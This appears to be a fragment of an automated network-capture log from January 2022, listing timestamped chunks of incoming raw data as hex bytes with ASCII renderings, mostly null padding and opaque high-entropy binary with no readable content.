                                                                                                                                  2022-01-11 22:38:59 UTC711INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC719INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC727INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC735INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC742INData Raw: b1 00 9d 0e 8d 1b f8 62 fa 06 8d 28 4c 34 ca 03 d7 41 10 f0 fb ae da 22 6e c6 2f 00 36 68 b2 d9 4b ae 0e f2 7d 59 4c 4b 9e 56 77 0f 42 fe 6a c7 7e 6a d3 fc 16 23 3b a4 4a 90 00 12 1b 6d 77 5c cd 77 aa 52 96 60 bd bc fd e0 c6 04 c4 b8 7a 71 22 71 fd 0c 58 3b fe d5 b4 07 21 5d 2b f7 86 d1 59 cc 79 c4 46 52 fe 80 ce 72 41 86 29 0d a3 48 2f b7 4e e5 df 81 c9 5f ac 3f 13 06 e5 0f 79 e8 51 96 58 46 ab 09 c4 3e ca 58 d6 04 4c ed 86 cf 9a 42 ad ad 06 5e 6c 5a 4a 63 ed 32 c8 bc d1 bc 57 dc 0c ae 83 a0 c2 57 da 7d 2a e4 86 3b 67 ad 84 26 6b f3 e1 e3 39 a7 9d 87 11 a0 93 8e 90 05 8b ec e1 db 34 08 4c 0b de 34 d6 d6 1d be e7 65 f7 78 c0 e0 73 36 d8 52 35 5d ea 52 27 8e d8 2f 0f 24 50 80 8e 13 d7 5e 32 79 45 46 38 ee fc 7c ac 6a 7e 3e a7 20 ea de 2d 5f 45 ec e3 a5 d4
                                                                                                                                  Data Ascii: b(L4A"n/6hK}YLKVwBj~j#;Jmw\wR`zq"qX;!]+YyFRrA)H/N_?yQXF>XLB^lZJc2WW}*;g&k94L4exs6R5]R'/$P^2yEF8|j~> -_E
                                                                                                                                  2022-01-11 22:38:59 UTC750INData Raw: aa f3 b2 45 19 4d 78 f8 3b f9 61 9f 1a eb cd b4 25 34 8b a2 7a 74 9c 28 66 87 72 36 e7 2f 92 32 c0 20 80 b3 a3 6b 43 22 17 c4 4d a1 77 1f c5 00 c4 6f 71 37 12 9a c7 0f 85 55 f1 41 69 dc a5 07 69 82 4d 47 97 ec a7 44 ae e0 99 52 c4 9e 8d d9 34 23 88 fc 3f e8 c2 ba 8b 95 a2 34 01 b5 96 9e 2a 54 3f 36 d9 d4 5c e5 e9 fc 06 12 9b ad a3 55 18 90 ea 3d 6c 07 8d d1 53 1d 90 fe 68 59 19 9e 9a 45 2c 72 b8 1c 2a 7a 67 e9 48 4d 98 f6 3e 77 cf 6c 25 2b 12 8b 2b ff 16 7e 5d 36 e7 07 74 5d c6 01 6e fe e6 a1 0c 25 eb 77 55 5c 2e 06 03 12 d9 2f 5e 9d 70 9a 39 f8 65 f7 8c f4 db 35 e5 d4 91 24 fa 77 62 f3 d5 25 0c 2a 86 2a bf 5c 70 b3 e0 2a 49 1a 95 89 dd fa df 9f c8 4f b0 9e c7 31 3e 89 01 b1 b5 b1 91 95 ee c1 f5 8c 2c 68 fe 76 c7 1d 69 db 19 66 2d 9f 52 ac 12 63 2c c8 ce
                                                                                                                                  Data Ascii: EMx;a%4zt(fr6/2 kC"Mwoq7UAiiMGDR4#?4*T?6\U=lShYE,r*zgHM>wl%++~]6t]n%wU\./^p9e5$wb%**\p*IO1>,hvif-Rc,
                                                                                                                                  2022-01-11 22:38:59 UTC758INData Raw: 29 37 18 9e 4b 37 99 03 41 24 53 62 b6 9b 16 83 92 ea 71 10 f7 80 02 c2 e7 c6 5b 95 ea 73 e7 e9 98 be 2d 25 37 c5 8c 59 d7 68 c4 22 7e 01 1a 13 10 b6 91 69 92 48 8f 8f 24 33 c9 e1 63 6a b4 af 19 29 d4 03 0d 5f dc 0d d1 b8 69 a2 22 0b 89 aa 9b a6 ef 4d 9c fd 3b a5 d9 ba 39 51 3d 8f 16 4e 53 b6 71 bf 07 b5 57 c2 92 5c eb ee 7a 98 b3 12 0f ae 64 8d bc b0 a8 34 26 f5 04 d6 b3 04 de 42 24 89 bd 48 8a b9 27 0b 76 6d 53 33 fd ea 53 eb 5c 8e a2 15 7f 41 2a 99 a8 f0 17 44 d6 c9 be 23 43 7c b3 56 94 0a d1 a9 1b 98 ba 90 10 b8 a3 43 0d 42 e0 51 e3 a7 76 1a 42 1e 05 5c 82 bb 2e 8b 05 1e 4b 33 a9 b9 eb 1e 37 7b ee bb 75 8b 05 c4 ad 77 d2 5a 63 2c 27 fc dc c4 6b 76 bd 17 5c c9 bd b8 f6 d2 51 1f b4 2d 3a 84 18 4c 81 06 9e b0 47 b9 b2 68 2e 1e 57 a8 5a 41 ef 31 4a 8c 19
                                                                                                                                  Data Ascii: )7K7A$Sbq[s-%7Yh"~iH$3cj)_i"M;9Q=NSqW\zd4&B$H'vmS3S\A*D#C|VCBQvB\.K37{uwZc,'kv\Q-:LGh.WZA1J
                                                                                                                                  2022-01-11 22:38:59 UTC766INData Raw: 8a 83 cd d0 a9 d8 8b cd f1 59 e0 b2 33 36 cc e5 75 41 d3 7e fe 70 ea 14 dd 03 27 f9 32 c8 5f 40 86 97 4e 62 4b 75 c0 4d c4 38 77 da a6 76 dd b1 77 7e b4 77 4f fc 21 1d 3c 9c 97 2a c6 08 1d ec fe 69 fd c3 81 9c f3 30 ad 03 f7 19 bc d2 74 cf fe 0e df 67 a1 d1 88 e8 1f d1 b5 12 77 c0 b4 31 3e 5e 54 da 5b 60 1e 7e 72 3b 26 e1 13 36 a4 e8 3d 62 2a a3 3d 0a 6d 0c 5e 33 1c 60 e3 6d 6b 83 af 8a 17 a4 5e a9 07 e3 b2 49 9f c4 91 d6 8a 28 5e f0 4b ab cc 23 4e 45 b5 ab b0 ef 01 d9 21 65 9e e4 99 d6 84 1d d7 98 25 19 ef f4 cb 00 0a e1 87 80 ba 00 40 03 1c 85 e0 15 74 71 73 1e 23 87 3b 21 3c df c5 4e 0e d4 9a 96 de a9 22 c5 90 14 0e 7e 98 84 cc 97 d1 ef fe 3e 15 ec b0 b7 3a 30 c0 03 af 60 a6 2e 40 6d b4 91 46 7d 8a eb d6 c3 28 95 ae a4 55 fa a9 f3 36 f3 d4 7d cb 75 d7
                                                                                                                                  Data Ascii: Y36uA~p'2_@NbKuM8wvw~wO!<*i0tgw1>^T[`~r;&6=b*=m^3`mk^I(^K#NE!e%@tqs#;!<N"~>:0`.@mF}(U6}u
                                                                                                                                  2022-01-11 22:38:59 UTC774INData Raw: 8c 35 5e 09 95 be d7 d7 39 7e 65 1c d1 c8 08 76 f4 f9 82 e6 69 c2 34 47 43 9a 0b 27 2f c6 0b 32 66 6f 90 05 b0 85 69 99 c6 09 b2 24 7b 90 c8 c7 3a 05 79 b5 86 02 e5 25 6c 64 b2 be 02 27 d0 22 13 66 60 6b 42 46 d3 fe fc d8 70 fc bb 34 41 7a 44 c2 e9 1a 57 06 d5 e5 bc 74 22 91 d5 51 60 a0 5f c3 82 16 bd 6b 48 86 a8 d5 d7 2e 02 1a 2d 28 d7 17 12 25 f2 6b 2c f6 ee 4e ae 0f a6 f3 53 84 7f 4d 4c 67 53 37 ec 08 70 34 ef 55 89 f0 7b e0 f6 00 94 cc d3 6b 54 fe aa 82 e4 2b 0e f9 b7 bd 5c d1 4a f0 bb 02 d5 e5 7a ec ca 6c 19 67 24 7e de 14 84 f9 9b 13 52 e7 bd 9d f2 aa 41 cf e2 ac f2 97 91 c2 af aa 33 51 55 c7 59 9d a2 31 bd a2 dd b3 eb 30 83 b3 15 19 b7 95 2e 07 1a 0e d2 78 1b 87 cf 97 72 1c e6 8a ed 65 b2 24 34 af dc c3 f8 7f 6b 9f 84 d9 84 ed e7 d5 fc 14 cf ab 25
                                                                                                                                  Data Ascii: 5^9~evi4GC'/2foi${:y%ld'"f`kBFp4AzDWt"Q`_kH.-(%k,NSMLgS7p4U{kT+\Jzlg$~RA3QUY10.xre$4k%
                                                                                                                                  2022-01-11 22:38:59 UTC781INData Raw: cb 36 ef fc 87 0e 38 b6 3f a4 95 87 93 19 63 4e ba f2 cf e6 4c 55 ee f6 f5 95 08 c0 c9 43 11 fc ac 8a 87 94 09 f7 81 58 f8 04 ee 3c 82 63 e5 8d ab fc 13 74 b2 6c 96 cc 54 0a a9 30 21 22 dd 27 9d 51 8b 28 c3 ef 20 b7 06 54 83 72 e1 40 97 4e 27 43 42 75 78 16 6b 2b 3b 5b b4 5a 71 a7 cf a5 28 7d 64 49 60 23 a5 65 78 a8 cc f1 6c f8 58 61 b8 6f c6 e9 e5 c8 16 ed 9d 2d 4f c0 8f f6 26 1c 3e ae f2 b9 3d 32 d4 e6 a3 29 db c9 36 0a d2 4d e2 d8 bc 81 a6 f7 cf 6d d6 9e bb 24 4b b1 6a b5 95 be 2e 86 e4 60 5e ea d7 5b 37 12 5b 6d f5 df cf dd 17 03 cb ed 72 74 81 1c fe 9d 55 c2 50 8c 14 cc 1f bf 48 1c d6 54 d1 56 b2 78 c5 3b e1 50 16 a7 65 1a f1 41 17 a0 ca 51 3a 3c 40 80 be 12 48 4d 97 44 cd 8d b9 12 f0 ef 84 f3 a8 2b 24 49 77 8e fc 98 bb 60 79 e4 43 c8 97 85 c5 6f d2
                                                                                                                                  Data Ascii: 68?cNLUCX<ctlT0!"'Q( Tr@N'CBuxk+;[Zq(}dI`#exlXao-O&>=2)6Mm$Kj.`^[7[mrtUPHTVx;PeAQ:<@HMD+$Iw`yCo
                                                                                                                                  2022-01-11 22:38:59 UTC789INData Raw: 1b 2d 83 2b 27 39 7d 56 1d b5 e2 4c c3 db 08 d5 55 cf 75 be 92 74 dc 1d 9d cd 88 69 65 27 6b 44 05 ac 4f 4d fd 74 42 d2 8f 89 fb c0 98 38 1c eb d5 09 8b 7a a4 b4 f5 59 a1 15 d0 18 fc 1e 0c 99 be 3f 59 bf 96 0c b0 d2 21 af 10 6b 9f a6 46 20 d0 9d 0f 55 a8 41 ab 51 cc 35 b0 11 ee a5 3a 70 2c 29 20 2f 3a 9c 81 22 57 26 46 a3 cd e4 b8 32 3e c3 0b 92 5a f8 b2 eb 79 3c 7d b9 18 b1 30 32 70 b7 34 92 43 49 65 d1 60 45 d4 e2 a6 16 20 a6 27 23 c5 94 ae e7 3b 23 d8 65 58 94 e9 1a 8c 05 6d 5f cd 4e 60 43 2b 51 e1 af bd 97 3b 8a 56 9b 26 50 59 ec 83 1d 06 3d 22 ec f5 4b 01 51 a2 ac 0c 0d fe 9f 36 ce 3b 8d 2a 5e 42 52 3c 5c 45 b5 63 6e 95 5c a0 1d 0c 59 06 20 6c 72 13 a2 ad d4 9c 39 2e 99 9e 27 7e 2d 81 22 8d d5 e3 61 05 ba 50 61 fc 19 c5 a4 d3 23 b1 13 da 2b 30 e2 13
                                                                                                                                  Data Ascii: -+'9}VLUutie'kDOMtB8zY?Y!kF UAQ5:p,) /:"W&F2>Zy<}02p4CIe`E '#;#eXm_N`C+Q;V&PY="KQ6;*^BR<\Ecn\Y lr9.'~-"aPa#+0
                                                                                                                                  2022-01-11 22:38:59 UTC797INData Raw: 10 b8 b1 4a 52 b9 f5 bf 5a 2a 6b 60 eb 8c 43 05 38 8c 11 e8 3b fa ca c9 60 f6 b8 0b f2 a3 7e 9d 6c f1 23 d7 f8 fb 95 31 84 5b fe ec f1 a6 89 b4 34 34 4d 1a 0c a0 bb 31 a3 59 bc 03 8a 70 ad 9c 51 b6 79 e7 11 ed c9 de 98 b1 c9 3f 7a cd 70 9c 59 ea 66 1c c6 f8 38 ff 1c ba 92 54 f8 f0 ac 81 90 1a e4 a6 c1 fc 68 27 0f c3 cf be e5 4f c7 ad e7 1f 80 0b b7 2a 56 c7 5c c0 aa d3 cc c7 62 fa f4 84 ee c1 65 22 ba df bd a0 48 cd 16 61 5d 19 82 6c 3b 22 05 20 c1 64 99 02 50 94 ae 60 e5 da cb a6 d6 ae 8d df ab 7d 35 16 14 3e 3b e0 67 8f 6e ce de 06 b0 8a 00 ba b8 4b e8 79 50 13 21 a6 5f 35 08 2d b0 c6 5b de 6e fb 98 b2 8c e9 6b 21 df 1a e5 b2 3e 81 e5 18 64 c8 51 b4 c2 ab 9f 7c f3 a3 60 2b 7e 44 6b f7 94 58 8b f9 3d eb 76 5c 6a da 1b 5b 8b 0b 80 eb 8f 0a 8a 16 ae f1 83
                                                                                                                                  Data Ascii: JRZ*k`C8;`~l#1[44M1YpQy?zpYf8Th'O*V\be"Ha]l;" dP`}5>;gnKyP!_5-[nk!>dQ|`+~DkX=v\j[
                                                                                                                                  2022-01-11 22:38:59 UTC805INData Raw: f8 9d aa 91 12 b0 3e ee b1 cd 4a 77 61 78 82 20 b7 34 75 d3 8d 2a 5e 1e aa 5a e7 6a d6 f3 fd d8 ce 09 11 5d c2 3f 77 26 cc e5 b5 78 7c 53 03 92 6c a2 6c 18 cf 14 ae 15 16 f5 c0 be 18 93 2b 21 0e ef 3f 3b 0d df 18 65 4f 13 a7 b5 dd a6 1b 35 b7 f5 94 91 1b 83 3b 24 32 9a a7 08 e4 13 fa 3a c8 9f 12 c2 bc ed b1 48 c4 cf 6f f2 8f 8a 78 4f 85 c4 7a 48 90 13 5b 58 e6 c1 2b e0 9e 3b b7 75 c4 f6 c8 0c 7b 9d a1 eb 31 dc f8 21 b5 9f 03 4b 12 e0 53 82 ae 9b f8 45 cb 63 60 4e 9e 17 9f 8b 31 0a e0 b9 13 91 94 70 65 a7 4e 02 c7 39 1a 50 f7 2f 19 85 5a ee cb fb 68 1b e7 38 cf e5 19 01 12 fb ec e1 48 fa 53 2f 62 63 95 0c d0 86 e0 7c e7 44 cf 0b 6c 34 ab 02 77 d0 56 61 74 9e fa 50 a9 bf 50 bc 5a 7f 05 27 96 d0 cb 99 02 81 43 03 1f a0 63 58 f0 cf 0e 03 75 cc f3 8e b2 7f ce
                                                                                                                                  Data Ascii: >Jwax 4u*^Zj]?w&x|Sll+!?;eO5;$2:HoxOzH[X+;u{1!KSEc`N1peN9P/Zh8HS/bc|Dl4wVatPPZ'CcXu
                                                                                                                                  2022-01-11 22:38:59 UTC813INData Raw: 14 dc de e5 63 c3 60 1f 2b 38 cb ea 00 c2 79 54 82 d0 47 72 83 1a db c2 03 f2 63 59 ec d8 c6 7d 26 bb d4 c8 16 c3 23 d3 f1 9b 9e 35 f4 33 80 cd df 61 db b7 ac e4 b5 a8 3d 8e a0 eb 4a 12 6d 42 50 04 28 4d e1 47 5d ab c3 8d 81 9c 43 a0 62 7b f0 ab 01 63 ee 17 fb f7 26 1c a4 dc ec df af 2e 81 87 d0 20 20 7f 41 01 2b c4 f0 a0 12 be 4b 79 d6 b9 3e 19 f7 28 54 d4 89 c9 3c f8 f3 66 06 68 a7 68 c3 b8 03 65 54 78 2f 9b 8c 96 b7 5a 08 02 f7 37 ad d9 b2 2f 41 52 5c 67 d2 b7 36 b0 67 93 96 fd d9 04 28 6c 56 47 4d 9f f0 2d 40 61 b9 d0 47 66 d8 b0 94 6e c7 c0 fb 2b b9 da dd 60 a8 73 91 65 69 61 95 16 d3 44 86 44 d8 d0 79 e1 78 b2 29 48 4e 01 d3 dd 0b 84 78 35 45 04 93 19 50 cf ae 91 4c 73 6d 07 0a ae 45 e9 e1 d6 e6 3d 25 38 9d 98 87 42 62 f5 8f a7 f0 23 2a cb 41 74 ae
                                                                                                                                  Data Ascii: c`+8yTGrcY}&#53a=JmBP(MG]Cb{c&. A+Ky>(T<fhheTx/Z7/AR\g6g(lVGM-@aGfn+`seiaDDyx)HNx5EPLsmE=%8Bb#*At
                                                                                                                                  2022-01-11 22:38:59 UTC821INData Raw: cb 6a d6 a6 89 1b f5 3f e8 29 b7 42 a7 61 63 80 8f 25 b7 29 ae 83 a6 88 44 92 9d 8a 4b 31 29 c9 33 4c 81 e8 fc a8 22 7c ab 43 19 8d 47 2e 9a f5 4e 42 8a 6a 4c 8c 92 07 f5 c5 d6 14 1d 7b 0a 4e 36 82 7e 66 4f 8a 40 12 e8 8f c9 5c d1 c8 42 32 9a 02 6b 43 ab 49 8b 16 c9 19 2c e1 9f c4 5e 21 93 d9 57 b2 03 70 a6 0c c1 8e e8 0a c2 cc 07 00 1d fb cf 5d d6 bf 42 b2 b0 87 c6 91 8b a3 6a fa c4 f1 0d cb 36 aa 28 93 4e 16 b8 f5 d8 df a0 d4 81 e9 dd 8e 3a 5f 95 83 e1 db da 2c b3 f9 fe 53 fd 5d 38 b0 cd b8 7d 3f d7 c7 b3 4a ca 34 99 bd 8c 73 e4 5b 57 f8 00 2b 14 16 76 f5 fc 68 a1 f1 d8 b8 f4 c8 c6 7c 7d 8b d5 a4 16 f0 e3 c4 5c 52 44 54 ca 5f e8 21 5a 17 fc 1d 38 bc 5b 94 30 b0 37 0f 6a ac af 63 02 35 87 2d 29 c9 9b d9 cb b2 73 70 84 11 64 b5 87 12 ce ec b5 3c 69 90 3c
                                                                                                                                  Data Ascii: j?)Bac%)DK1)3L"|CG.NBjL{N6~fO@\B2kCI,^!Wp]Bj6(N:_,S]8}?J4s[W+vh|}\RDT_!Z8[07jc5-)spd<i<
                                                                                                                                  2022-01-11 22:38:59 UTC828INData Raw: ce e5 93 56 0f 70 84 14 d6 7a 7b 3b be b3 49 5d a7 b2 f9 bb 87 69 e5 d3 de e5 b0 1e a1 0b 0b e4 78 27 b8 d2 2c 3d 18 b3 99 ae 5b 6d 75 80 f5 2f f5 82 ff f4 5e 0f 89 85 a2 64 e5 12 30 a0 8c 6f bd e5 37 bc d9 0f 15 af d2 62 bb 64 96 96 4a d4 c2 a0 0a 90 31 2d 21 34 0c 63 a6 63 d0 db a7 8c d1 bf 3e 08 cb d7 f5 fd fa 77 3c f1 03 4e 9a 41 04 86 74 10 2d 30 f6 4f 08 69 37 8c 17 6e 8e 5b 96 f5 19 ca 2a 09 5d ff d8 24 1e 5b e6 c0 cd 98 27 00 e7 7b 0d b4 6b 3c df f4 93 67 29 63 38 9b d9 b2 4a ca 1f b2 ee 2b fd 2b 5f 17 00 16 8d a7 dd 23 3e 8e b4 46 08 4d cc 5c 5f e6 96 54 f5 4a 15 d1 2c 1d ed 2c 99 ab b7 11 12 f9 f3 b4 f0 fb 2a cb 8c 39 8e ea 0a 96 ee c0 06 88 f4 c4 9f e5 08 b1 e2 43 0e 90 b5 13 24 1b 27 0e 05 c1 a9 9e 6c 37 7b 25 8a 82 07 7f f1 4c 24 1f 77 a2 38
                                                                                                                                  Data Ascii: Vpz{;I]ix',=[mu/^d0o7bdJ1-!4cc>w<NAt-0Oi7n[*]$['{k<g)c8J++_#>FM\_TJ,,*9C$'l7{%L$w8
                                                                                                                                  2022-01-11 22:38:59 UTC836INData Raw: 25 07 fe fb ea 91 af 48 22 bc 89 ae f6 2f 60 9c 05 63 aa 74 8f 97 68 9f d5 07 91 aa 3a 8f f6 b1 b3 ed 6e 23 b4 40 ae 79 64 16 dd 58 59 8b 39 70 4a 46 50 4c ef 97 5c 7c 83 e9 62 f1 b4 a2 c1 c9 1b 78 59 b8 d1 a7 d4 84 fa 68 e1 5f 9a d7 16 7c c8 03 a4 01 c8 65 99 85 88 b1 96 69 08 1b cc eb 32 e5 37 3e eb c6 fc 41 0e fa b1 ac 7a 6c b9 af 56 64 6f db bd fc da 12 01 4a 38 11 c3 a9 88 ef 2a 38 30 4a 10 fe 16 54 00 1d 42 f5 ab 1a 13 c6 22 55 e0 0f 84 42 21 10 3e 6b 84 22 57 08 9c fd 7e 18 3a 0e 3e bd d1 c0 72 07 bd fa d6 c2 f6 b7 e2 0a 62 ea 17 cc cb b8 e1 ac 49 0e 29 a7 36 88 cb cf 3a 91 bb fe 74 37 c1 48 29 ff b2 0a 8a 0a 5d ac f4 03 e6 56 64 40 f7 05 4b 3c b8 92 bf 70 0b c1 b4 01 aa 95 5c e5 97 89 e7 68 cd 7a a2 1f 5a 62 9f 96 b6 af 65 eb 08 0d 77 8a 46 5d d1
                                                                                                                                  Data Ascii: %H"/`cth:n#@ydXY9pJFPL\|bxYh_|ei27>AzlVdoJ8*80JTB"UB!>k"W~:>rbI)6:t7H)]Vd@K<p\hzZbewF]
                                                                                                                                  2022-01-11 22:38:59 UTC844INData Raw: e3 13 7f f1 bb 20 05 d2 2c a4 50 5d a4 f8 c8 ed 19 d2 bf b4 a4 20 88 bd a0 1e f3 63 8e 38 97 e8 ab dd 70 88 e2 78 e5 66 c8 25 77 83 2c b0 1c bc ab c2 ac 44 a8 c7 2b 1f b3 5c b7 36 07 27 0e 2b b7 00 db 61 b1 18 db f7 13 dc f0 01 cb 90 54 3c dd 59 95 16 8c ee 40 04 5f 30 a6 5a ba 0c ac 09 78 5e 72 ba c5 ea 5e 92 7b a1 4c 0b 95 8d e3 ab ca 5f ca e9 94 12 fd db 82 77 be 1c 57 9f 60 17 17 eb 9e b5 27 da d1 53 c7 3f f8 08 04 8e e6 0b aa 2f ea de 21 d8 23 49 72 58 04 65 fe ac 34 fc 4d 74 d2 8c 5c aa 63 a8 d3 9e 1a 39 4f 7c a5 52 66 82 2f d0 aa c3 53 14 01 e3 9d 36 17 e3 71 20 0b 27 79 e3 66 29 d6 72 28 f4 b6 4e 64 11 b6 f9 b5 d4 94 db e7 d4 98 06 59 62 0c 16 79 8b 56 9c cf a9 28 14 bd 78 e1 9f aa 5b 7a 5c 39 56 55 da bd 60 06 dd d6 7b 75 fc d8 74 0f bf 2b 64 ca
                                                                                                                                  Data Ascii: ,P] c8pxf%w,D+\6'+aT<Y@_0Zx^r^{L_wW`'S?/!#IrXe4Mt\c9O|Rf/S6q 'yf)r(NdYbyV(x[z\9VU`{ut+d
                                                                                                                                  2022-01-11 22:38:59 UTC852INData Raw: e5 de 30 a4 b5 4a 36 1a 04 f0 5b 65 62 1e bd e4 7d 3d 80 18 66 67 5c 4b cb 54 de f6 16 f8 84 dd 2f 4e 49 bd 2f 3a e3 ff 52 e7 f6 00 82 71 90 c0 a3 33 8e 29 97 ae 7f ca 28 49 e9 94 5b d0 3e 92 90 6f 3f 3d 0b e3 05 47 1e 87 22 ef 82 48 1f fe 09 57 81 bb 62 10 75 4a 78 8b 34 58 84 d4 2b 72 5c cc 80 fe 17 07 f6 a6 b8 e2 57 51 0b 71 26 93 dc e5 47 4b bc b4 9f 46 db da df 89 e7 48 a8 0d b3 ed f6 1c 1b 52 0b 96 3e c4 bd f1 47 be 74 0c 53 b5 87 d0 24 dd 37 bc 11 e3 b1 ec 11 3b c6 1d 44 aa 20 00 5a e1 3f a1 6c fa 93 c9 d4 68 4b 03 3f b0 52 bc df 3c e6 c7 4c 44 19 7a ba 08 eb 61 85 10 94 79 b7 a2 f1 ad 19 87 9a 18 71 74 d8 1e 14 d7 99 14 05 de c3 3d d4 49 32 41 c1 bf 97 b4 2c 0d 9e 29 88 6c e1 93 1d c7 2c b9 4c 3a dc ce 04 f9 f1 9d e9 b8 ba 27 6b 76 21 85 a2 57 93
                                                                                                                                  Data Ascii: 0J6[eb}=fg\KT/NI/:Rq3)(I[>o?=G"HWbuJx4X+r\WQq&GKFHR>GtS$7;D Z?lhK?R<LDzayqt=I2A,)l,L:'kv!W
                                                                                                                                  2022-01-11 22:38:59 UTC860INData Raw: ba dc 7f 0d d3 08 fa fd e7 c9 1c 97 7a 66 58 1a a9 6c 74 3c 23 c9 d3 1f 44 7e 51 63 a1 e1 51 5a 2a 5d 8c dd 99 65 f8 06 88 a3 be fb 90 5e db 71 eb 79 2e 69 3e 9e b5 b9 87 da 36 1c 39 c3 0f b7 68 7d 0f 8b 79 78 9a a6 fc 77 85 e1 e8 c6 4b 5d 5e 81 96 cd d0 89 52 a2 6e ab 4b 68 d5 0a 98 f6 8b 96 b1 79 73 56 dc 0e 11 0c 35 89 98 9f 0d 81 97 8c c3 92 51 70 19 d3 88 83 f7 20 df dd c4 08 8d 62 af b9 f6 0e 59 e4 4b 92 6d 30 9e 55 4a 1e 63 cd 0c ad 1a f5 ea 2c 16 da 1e 04 f7 57 b1 e8 52 c9 05 f0 bc cf 08 e5 0f 43 12 e0 43 f6 c9 a2 a7 e5 4f d4 c7 26 cd fd cb a3 dc 5b 5d 52 8d 9d 8b b9 64 2d 3e 15 da 64 ab 0a f5 1b c5 2e 58 20 5f ad b8 36 af 0b 10 e3 f8 5c b4 7c 85 47 8e 8f c1 59 12 0a 75 b6 ad 9f 18 a9 96 39 67 f4 49 51 1f 54 fc 73 b8 fd 96 a4 31 dc e9 34 3c a7 33
                                                                                                                                  Data Ascii: zfXlt<#D~QcQZ*]e^qy.i>69h}yxwK]^RnKhysV5Qp bYKm0UJc,WRCCO&[]Rd->d.X _6\|GYu9gIQTs14<3
                                                                                                                                  2022-01-11 22:38:59 UTC867INData Raw: 27 5f bf 51 10 ee d3 51 06 37 10 47 a2 29 a3 e0 64 a3 3f c8 0a e1 df 2b e1 2c 6f 64 7c cb 98 29 d8 42 9b 12 8e 1c 82 17 75 74 fd 54 1d 29 20 55 db e1 00 41 36 40 a1 09 f3 4b 78 2d 4a 02 b1 19 73 4c 97 5d e9 b0 e9 98 07 cd 83 bb 9d 4b b3 19 82 30 1b aa fd 09 61 5e f3 dd c4 7e 83 8a ea af ff a9 0a f7 64 ea ac 7c ca 73 73 bc 1b 57 af d1 bb 65 27 59 37 a4 16 2d 2a b8 dc 0f 20 83 55 51 80 9b b8 68 ac c6 88 39 78 a0 51 31 a0 6c 0a 1d d4 a4 4f 5e 5f 94 1e e4 5e 70 07 1c c4 59 22 7f 07 2d a9 ec 8f 00 7a ee e9 5e c6 e6 3e e2 11 03 22 72 2c e3 3a ac 14 32 cc 96 92 f2 19 bb 0b e4 0d ec 35 ff 5f d7 